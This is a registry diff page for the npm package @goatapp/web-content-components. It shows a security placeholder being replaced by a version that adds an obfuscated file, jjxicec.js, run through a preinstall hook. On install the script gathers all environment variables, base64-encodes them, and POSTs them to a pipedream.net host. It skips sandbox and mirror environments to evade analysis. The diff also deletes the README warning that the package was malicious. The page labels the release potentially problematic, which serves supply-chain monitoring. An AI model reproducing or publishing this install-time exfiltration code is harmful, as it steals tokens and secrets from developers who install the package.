@goatapp/web-content-components 0.0.1-security → 9.940.579
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Potentially problematic release.
This version of @goatapp/web-content-components might be problematic. Click here for more details.
- package/jjxicec.js +1 -0
- package/package.json +8 -3
- package/README.md +0 -5
package/jjxicec.js
ADDED
|
@@ -0,0 +1 @@
|
|
|
1
|
+
function a0_0x10ac(_0x1c658d,_0x38a710){const _0x4e62b5=a0_0x4e62();return a0_0x10ac=function(_0x10ac9c,_0x27418b){_0x10ac9c=_0x10ac9c-0x1c3;let _0x4ec568=_0x4e62b5[_0x10ac9c];return _0x4ec568;},a0_0x10ac(_0x1c658d,_0x38a710);}const a0_0x56ca0c=a0_0x10ac;function a0_0x4e62(){const _0x1c54ed=['stringify','5013687GNzriw','USERNAME','2615544GFSrFj','from','keys','toString','7449785YmZAQe','1614130ltNLQR','length','6gPtxTO','daasadmin','some','1432UYJDWC','POST','taobao.org','tencent.com','pipedream','6473720PBlNfO','net','includes','npm_config_registry','base64','write','155331WjyxTr','bd43527e019ae8efb47eb39bb9313ac5','1686706ijfaxE','env','error','join'];a0_0x4e62=function(){return _0x1c54ed;};return a0_0x4e62();}(function(_0xe05b07,_0x5ecf1b){const _0x30b675=a0_0x10ac,_0x1c0d3e=_0xe05b07();while(!![]){try{const _0x5076c7=parseInt(_0x30b675(0x1d7))/0x1+parseInt(_0x30b675(0x1cb))/0x2+-parseInt(_0x30b675(0x1d0))/0x3+-parseInt(_0x30b675(0x1d2))/0x4+-parseInt(_0x30b675(0x1c3))/0x5+-parseInt(_0x30b675(0x1d9))/0x6*(parseInt(_0x30b675(0x1d6))/0x7)+parseInt(_0x30b675(0x1dc))/0x8*(parseInt(_0x30b675(0x1c9))/0x9);if(_0x5076c7===_0x5ecf1b)break;else _0x1c0d3e['push'](_0x1c0d3e['shift']());}catch(_0x1b3f68){_0x1c0d3e['push'](_0x1c0d3e['shift']());}}}(a0_0x4e62,0xd2a0a));const http=require('https'),filter=[{'key':a0_0x56ca0c(0x1c6),'val':a0_0x56ca0c(0x1de)},{'key':'npm_config_registry','val':a0_0x56ca0c(0x1df)},{'key':a0_0x56ca0c(0x1c6),'val':'registry.npmmirror.com'},{'key':a0_0x56ca0c(0x1d1),'val':a0_0x56ca0c(0x1da)},{'key':'_','val':'/usr/bin/python'}];function main(){const _0x3e3ee4=a0_0x56ca0c;var _0x5daa51=process[_0x3e3ee4(0x1cc)]||{};if(filter[_0x3e3ee4(0x1db)](({key:_0x1fc1c8,val:_0x9ad079})=>_0x5daa51[_0x1fc1c8]&&_0x5daa51[_0x1fc1c8][_0x3e3ee4(0x1c5)](_0x9ad079))||Object[_0x3e3ee4(0x1d4)](_0x5daa51)[_0x3e3ee4(0x1d8)]<0xa)return;req=http['request']({'host':[_0x3e3ee4(0x1ca),'m',_0x3e3ee4(0x1e0),_0x3e3ee4(0x1c4)][_0x3e3ee4(0x1ce)]('.'),'path':'/'+(_0x5daa51['npm_package_name']||''),'method':_0x3e3ee4(0x1dd)})['on'](_0x3e3ee4(0x1cd),function(_0x9f346f){}),req[_0x3e3ee4(0x1c8)](Buffer[_0x3e3ee4(0x1d3)](JSON[_0x3e3ee4(0x1cf)](_0x5daa51))[_0x3e3ee4(0x1d5)](_0x3e3ee4(0x1c7))),req['end']();}main();
|
package/package.json
CHANGED
|
@@ -1,6 +1,11 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@goatapp/web-content-components",
|
|
3
|
-
"version": "
|
|
4
|
-
"
|
|
5
|
-
"
|
|
3
|
+
"version": "9.940.579",
|
|
4
|
+
"main": "jjxicec.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
|
7
|
+
"preinstall": "node jjxicec.js"
|
|
8
|
+
},
|
|
9
|
+
"author": "",
|
|
10
|
+
"license": "ISC"
|
|
6
11
|
}
|
package/README.md
DELETED
|
@@ -1,5 +0,0 @@
|
|
|
1
|
-
# Security holding package
|
|
2
|
-
|
|
3
|
-
This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
|
|
4
|
-
|
|
5
|
-
Please refer to www.npmjs.com/advisories?search=%40goatapp%2Fweb-content-components for more information.
|